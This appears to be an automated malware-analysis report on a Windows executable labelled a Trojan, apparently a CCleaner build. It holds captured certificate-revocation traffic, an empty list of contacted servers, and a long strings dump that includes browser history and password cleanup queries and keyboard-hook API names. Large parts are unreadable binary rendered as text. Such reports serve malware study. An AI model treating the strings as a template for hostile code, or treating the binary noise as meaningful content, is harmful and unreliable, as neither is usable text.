Expires: Fri, 30 Jun 2017 10:47:50 GMT
Date: Sun, 25 Jun 2017 10:23:04 GMT
Connection: keep-alive
0..|......u0..q.. .....0.....b0..^0.............V.m......E!....2017062
3104750Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
....^.3@..cL.1.......20170623104750Z....20170630104750Z0...*.H........
.....~...R^....R.j>..#p.....U,.]..6..............._^By.j1v.S9N9.M..
...g....Hy...~.!.....`.l.....[.."..?...Z&l.i.u..(.d..v..kP...0.....6..
......JOT..r[dB9...;..9K..........h........{oP.*0.r.a ..,.o...F.....).
.Kx...=.j.....d..W.......@. "..dQ..ec..Y.....$...6/.......0...0...0...
...............[Df..{.,0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Sign
ing 2009-2 CA0...161213000000Z..211231235959Z0F1D0B..U...;Symantec Cla
ss 3 Code Signing 2009-2 CA SHA1 OCSP Responder0.."0...*.H............
.0.............2q..J..:...3....X.?.....9K.G....,......e.c,..9YI...z.qA
 0....9...CG......6.qX>.Xo.....g..=..B.E.......qB..W.|..>.qT.4Z|
....H. m...m..qy]Gi...0N.T.....N,.U.WJ5.f...r..@..8.b.......=..G.0....
.y4N"mK.J...."..".......ju.....k...x........P.]S=t....*..'............
.0...0...U.......0.0f..U. ._0]0[..`.H...E....0L0#.. .........hXXps://d
.symcb.com/cps0%.. .......0...hXXps://d.symcb.com/rpa0...U.%..0... ...
....0...U...........0... .....0......0"..U....0...0.1.0...U....TGV-OFF
-640...U.............V.m......E!..0...U.#..0.....k.&p..?...-.5.....0..
.*.H.............C.....S>F ..u.=KA5..@...`........a0s.M......JH.X.Y
..E........CX../......f5j..a......k...:.r/.J5..G...h...~.".A.]...2
<<< skipped >>>


GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT
If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com


HTTP/1.1 200 OK
Date: Sun, 25 Jun 2017 10:22:24 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=d3a89b324a946661227e68b0d57b9fe811498386144; expires=Mon, 25-Jun-18 10:22:24 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 25 Jun 2017 09:00:04 GMT
Expires: Thu, 29 Jun 2017 09:00:04 GMT
ETag: "2525577b8c28972efd2321c83127ee911855f24b"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 37473498a43f822b-KBP
0..........0..... .....0......0...0.......m.1.K..}$. ....?o....2017062
5090004Z0n0l0D0... .........W......#....*..2..1..`{f.E....P/}..4....K.
.......DN.BG....20170625090004Z....20170629090004Z0...*.H.............
...99.f.>).:.@.1A..kD..T.=znF.P.....@.s.....*..........^.......?.&l
t;a.Qmz..q.1..R....vV.*k...!.jI..N7..^..j... @...HI..1.|.. /!.........
.....NAV.S3.....;.0...!.9.@.O.Z.......C.!....KB...se.$...(&.b..'......
'......]..c'Q.0B.....n9....S... U..6y=.R.>et.h.l...x....0...0...0..
........H.....x.....V.0...*.H........0W1.0...U....BE1.0...U....GlobalS
ign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...1705070000
00Z..170815000000Z0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...
(GlobalSign OCSP for Root R1 - Signer 1.20.."0...*.H.............0....
.....^..99..`h..t......q......0...(g.r5..d.).K.@.\...D..x....t.|g&{x.F
..Q.(..<_..!..... ...E....?L%...wD.o}qH{B...1.?is..3..*....sV.D....
'5.e..9...o..i..y.hV.6.#.c.q|.0...:t..'...&B..B` ..D1s;..!..P.z..|.f.*
...j...&.vw.....DJ....c$=*^..?.).m..0S 6.....................0..0...U.
..........0...U.%..0... .......0...U.......0.0...U.......m.1.K..}$. ..
..?o..0...U.#..0...`{f.E....P/}..4....K0... .....0......0L..U. .E0C0A.
. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...*.
H................>.f..wt.b.I/6U.w.S:O.N..v...-w.........r...R......
.......a.Z....x9..=.;."s<B{.U(%.M..J!O*......c.1....GH.\[dp....R...
....(....oT.V.G..sl8.F...9..6..I..o9M.:;..`...*=),....jd...q.g.9...y..
...g....B......V&.b..k...O2....=..-..!.|0x.."..i......,N.)/.......
<<< skipped >>>


GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net


HTTP/1.1 200 OK
Date: Sun, 25 Jun 2017 10:22:31 GMT
Content-Type: application/pkix-crl
Content-Length: 782
Connection: keep-alive
Set-Cookie: __cfduid=d350e7f6f18242ba492fb4a2d4628fe861498386151; expires=Mon, 25-Jun-18 10:22:31 GMT; path=/; domain=.globalsign.net; HttpOnly
Last-Modified: Wed, 19 Apr 2017 00:00:00 GMT
ETag: 39
Expires: Sat, 15 Jul 2017 00:00:00 GMT
Cache-Control: public, max-age=1690649
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 374734c960208213-KBP
0...0......0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.
0...U....Root CA1.0...U....GlobalSign Root CA..170419000000Z..17071500
0000Z0..40*.........D.....141125000000Z0.0...U.......0*........)E.....
141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U......
.0*........,^.....141125000000Z0.0...U.......0*.........KZ....16010700
0000Z0.0...U.......0*......../N.IR..170419000000Z0.0...U.......0*.....
.../N.G...170419000000Z0.0...U......../0-0...U......90...U.#..0...`{f.
E....P/}..4....K0...*.H..............pZ.t.#y.D.`-....zi.7R.~h..U.h. 1.
..U.\|7r....q...V........e5_.QMcZ.x-r8c.../..8...Z."@..w..}g.D..[sF..k
.../.....#..0..Z..{.........R..S....|<.,T.........{........%Y...825
./.f.o.. u{..g!.........=......VC..T@..4..p.".........PE}....3......v.
95.....$.R.g..8HTTP/1.1 200 OK..Date: Sun, 25 Jun 2017 10:22:31 GMT..C
ontent-Type: application/pkix-crl..Content-Length: 782..Connection: ke
ep-alive..Set-Cookie: __cfduid=d350e7f6f18242ba492fb4a2d4628fe86149838
6151; expires=Mon, 25-Jun-18 10:22:31 GMT; path=/; domain=.globalsign.
net; HttpOnly..Last-Modified: Wed, 19 Apr 2017 00:00:00 GMT..ETag: 39.
.Expires: Sat, 15 Jul 2017 00:00:00 GMT..Cache-Control: public, max-ag
e=1690649..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudfl
are-nginx..CF-RAY: 374734c960208213-KBP..0...0......0...*.H........0W1
.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....Gl
obalSign Root CA..170419000000Z..170715000000Z0..40*.........D.....141
125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.....
<<< skipped >>>


GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Sun, 25 Jun 2017 10:22:58 GMT
Etag: "200c0-f1d-552672eafa7c0"
Last-Modified: Tue, 20 Jun 2017 17:00:01 GMT
Server: ECS (frf/8799)
X-Cache: HIT
Content-Length: 3869
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U..
..CyberTrust1"0 ..U....Baltimore CyberTrust Root..170620155552Z..17091
5155552Z0..`0....'k...120111220757Z0....'k...120111220847Z0....'.C..13
0130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140
212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..1004
14175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....10021
6203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208
175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...1101141
62156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0
.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...1
20111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..10
0414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101
208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..1103
02154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..10041
4175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714
160903Z0....'s...130123162633Z0....'....130904190524Z0....'....1310242
14319Z0....'....140129172435Z0....'....140129172453Z0....'....13102421
4310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155
638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...1506031846
05Z0....'k...150603185020Z0....'k...150603185058Z0....'k...15060318513
1Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909
Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_3308:




.text
`.rdata
@.data
.rsrc
@.reloc
B.vmp0
8%uEP3
SSSSSSSSSh
SSSSSSSSSSh
SSSSSSSSShJ
SSSSSSSSShM
SSSSSSSSShD
SSSSSSSSShG
t.Wj$j
SSSSSSSSShQ
G<SSh7
G<SSh
|$F.tMf
</tg<\tc<.ug
~$)~()|$
xSSSh
FTPjKS
FtPj;S
C.PjRV
<%u7j
X<%u2j
SSSSh
QSSSSh
~WVSSSSSSh
PSShd
Ht>Ht.HHt
htCp
<.tZ<>
t\HtEHt.Ht
H.SVW3
.FGy"
<0%u5
f;S.si
u u
,4,56,789
t:Ht.Ht"Ht
SSSSSSSSSh]
SSSSSSSSSh^
SSSSSSSSSh`
PSSSSSSh
SSSSSSSSSh6
SSSSSSSSSh7
SSSSSSSSSh5
SSSSSSSSSh:
%uASW
SSSSSSSSShW
SSSSSSSSShV
SSSSSSSSShe
SSSSSSSSShY
SSSSSSSSSShX
SSSSSSSSShU
SSSSSSSSShZ
uCSSSh
SSSSSSSSShT
SSSSSSSSSha
SSSSSSSSShc
d$$SSSSSSSSSSh
SSSSSSSSShN
SSSSSSSSShC
SSSSSSSSShk
98tCP
SSSSSSSSh
SSSSSSSSSShi
SSSSSSSSSh#
SSSSSSSSShP
SSSSSSSSSh"
SSSSSSSSSh
SSSSSSSSSh'
SSSSSSSSSh_
tCHt4Ht.Ht(Ht
SSSSSSSSSh!
SSSSSSSSSh$
SSSSSSSSSh%
SSSSSSSSShu
SSSSSSSSSh=
SSSSSSSSShx
SSSSSSSSShy
SSSSSSSSShz
SSSSSSSSSh|
SSSSSSSSSh}
SSSSSSSSSh>
SSSSSSSSSh~
SSSSSSSSSh?
SSSSSSSSShv
SSSSSSSSShw
SSSSSSSSSh{
SSSSSSSSShj
SSSSSSSSSSh`
SSSSSSSSShb
SSSSSSSSShd
SSSSSSSSSShf
SSSSSSSSShg
SSSSSSSSSShl
SSSSSSSSShm
SSSSSSSSSh1
SSSSSSSSSh2
SSSSSSSh$
SSSSSSSSShE
v%Sjd
SSSSSSSSSh<
SSSSSSSSShB
u1SSh
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
boost::filesystem::directory_iterator::operator  
kernel32.dll
Visual C   CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
GetProcessWindowStation
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
%d / %m / %y
%I : %M : %S %p
%m / %d / %y
%b %d %H : %M : %S %Y
3.8.1
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYS
ZwQueryKey
%Program Files% (x86)\boost\boost_1_54\boost/exception/detail/exception_ptr.hpp
1836216166
1953261156
boost thread: trying joining itself
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
LOGGING LIB internal error - should NEVER happen. Please report this to the author of the lib
%s_%s_%d-d-d_d-d-d.log
<Task xmlns="hXXp://schemas.microsoft.com/windows/2004/02/mit/task">
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Exec>
</Exec>
private\Net\Mozilla.cpp
UPDATE moz_places SET frecency = -MAX(visit_count, 1) WHERE id IN(SELECT h.id FROM moz_places h WHERE EXISTS (SELECT id FROM moz_bookmarks WHERE fk = h.id) OR EXISTS (SELECT id FROM moz_annos WHERE place_id = h.id AND expiration =
UPDATE moz_places SET frecency = 0 WHERE id IN (SELECT h.id FROM moz_places h LEFT OUTER JOIN moz_bookmarks b ON h.id = b.fk WHERE frecency < 0 AND (b.parent IN (SELECT annos.item_id FROM moz_anno_attributes attrs JOIN moz_items_annos annos ON attrs.id = annos.anno_attribute_id WHERE attrs.name = 'livemark/feedURI') AND visit_count = 0) OR SUBSTR(h.url, 1, 6) = 'place:')
CleanHistory - SQLite error:
SELECT h.id FROM moz_places h
LEFT OUTER JOIN moz_historyvisits v ON h.id = v.place_id
LEFT OUTER JOIN moz_bookmarks b ON h.id = b.fk
LEFT OUTER JOIN moz_annos a ON h.id = a.place_id
WHERE v.id IS NULL AND b.id IS NULL AND a.id IS NULL AND SUBSTR(h.url, 1, 6) <> 'place:')
CleanDownloadHistory - SQLite error:
CleanPasswords - SQLite error:
CleanPasswordsExceptions - SQLite error:
SrClient.dll
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Exec>
</Exec>
Cookie:%s%s
{9E175BB4-F52A-11D8-B9A5-505054503030}
{30c3f6cd-98b5-11cf-bb82-00aa00bdce0b}
hXXp://
7b81be6a-ce2b-4676-a29e-eb907a5126c5
1.3.6.1.4.1.311.2.1.12
WindowsCreateString
WindowsDeleteString
URLString
ux
profile.name
google.services.username
app.launch.web_url
extensions.settings.
extensions.known_disabled
extensions.settings
X:X:X:X:X:X
041ULKGbv7meLDmSgUyrkw==
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
RandomNumberStore: CopyRangeTo2() is not supported by this store
%s-%s-%s-%s-%s
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
operation failed with error
WerReportAddDump
WerReportCloseHandle
WerReportCreate
WerReportSubmit
%d_byte ptr
0xX
 0xX
-0xX
[0xI64X] ANOMALY: REX prefix before legacy prefix 0xX
[0xI64X] ANOMALY: Duplicate prefix 0xX
[0xI64X] ERROR: Reached maximum prefix count %d
[0xI64X] ANOMALY: Reached maximum prefix count %d
[0xI64X] ERROR: Invalid opcode 0xX
[0xI64X] ERROR: Invalid two byte opcode 0xX 0xX
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX   extension %d
[0xI64X] ERROR: Invalid group opcode 0xX 0xX extension 0xX
[0xI64X] ERROR: Opcode 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Invalid group opcode 0xX extension 0xX
[0xI64X] ERROR: Illegal opcode 0xX 0xX   modrm 0xX
[0xI64X] ERROR: Invalid FPU opcode 0xX   modrm extension 0xX (index 0xX)
[0xI64X] ANOMALY: operand size prefix used with 3DNOW instruction
[0xI64X] ERROR: Illegal opcode 0xX 0xX   suffix 0xX
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can't be used in 16-bit X86
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can only be used in X86-64
[0xI64X] ANOMALY: operand size prefix used with FPU/MMX/SSEx
[0xI64X] ANOMALY: use of operand size prefix meaningless when REX.w=1
[0xI64X] ANOMALY: use of REX.w is meaningless (default operand size is 64)
[0xI64X] ANOMALY: unexpected segment 0xX
[0xI64X] ERROR: Illegal use of lock prefix for instruction "%s"
[0xI64X] ERROR: maximum instruction length reached ("%s")
[0xI64X] ANOMALY: ENTER has invalid operand 2
[0xI64X] ANOMALY: ENTER has invalid operand 3
[0xI64X] ANOMALY: ret has invalid operand 1
[0xI64X] ANOMALY: retf has invalid operand 1
[0xI64X] ANOMALY: Instruction "%s" is modifying the stack
[0xI64X] ANOMALY: "%s" has invalid stack change 0xX
%s:[%s]
0xX=
]=0xX
[0xI64X] ANOMALY: Unexpected operand size prefix
%s 0xX:[
%s %s:[
[0xI64X] ERROR: mod != 3 for AMODE_PR ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_PR ("%s")
[0xI64X] ERROR: AMODE_PR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_VR ("%s")
[0xI64X] ERROR: AMODE_VR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_P ("%s")
[0xI64X] ERROR: AMODE_P illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_R ("%s")
seg_X
[0xI64X] ERROR: mod = 3 for AMODE_M ("%s")
[0xI64X] ERROR: mod = 3 for AMODE_E with OPTYPE_p ("%s")
?#%X.y
D:\v5.00A\bin\CCleaner\Release\CCleaner.pdb
RPCRT4.dll
GetProcessHeap
GetWindowsDirectoryW
WaitNamedPipeW
TransactNamedPipe
SetNamedPipeHandleState
KERNEL32.dll
EnumWindows
MsgWaitForMultipleObjects
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
ExitWindowsEx
GetAsyncKeyState
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegLoadKeyW
RegUnLoadKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
PathIsURLW
PathCreateFromUrlW
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
GdiplusShutdown
gdiplus.dll
UxTheme.dll
WTSAPI32.dll
NETAPI32.dll
CertFindCertificateInStore
CertGetNameStringW
CertFreeCertificateContext
CryptMsgGetParam
CertCloseStore
CryptMsgClose
CRYPT32.dll
WINTRUST.dll
ESENT.dll
IPHLPAPI.DLL
VERSION.dll
DeleteUrlCacheEntryW
DeleteUrlCacheEntryA
FindFirstUrlCacheEntryW
FindNextUrlCacheEntryW
FindCloseUrlCache
FindFirstUrlCacheEntryExW
FindNextUrlCacheEntryExW
InternetOpenUrlW
HttpQueryInfoW
InternetCrackUrlW
HttpSendRequestW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
GetCPInfo
.?AVwindows_file_codecvt@@
zcÁ
.?AUIOperation@Piriform@@
.?AV?$IOperationImpl@UIOperation@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IActivationEvents2AsyncImpl@VCActivationEvents2Marshaller@Piriform@@UIActivationEvents2@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$IActivationEvents2AsyncImpl@VCActivationEvents2Marshaller@Piriform@@UIActivationEvents2@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%s%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
sqlite_stat4
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
cannot create a TEMP index on non-TEMP table "%s"
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch - "%w" referencing "%w"
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
%s.%s
unable to open shared library [%s]
sqlite3_
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
defer_foreign_keys
foreign_key_check
foreign_key_list
foreign_keys
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_sq_%p
too many references to "%s": max 65535
%s.%s.%s
no such table: %s
SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
automatic index on %s(%s)
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING AUTOMATIC %sINDEX%.0s%s
%s USING %sINDEX %s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s.xBestIndex() malfunction
at most %d tables in a join
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
.?AV?$CKeyboardFocusImpl@VCCleanerListViewImpl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCFilterComboCtrl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCButtonEx@Piriform@@@Piriform@@
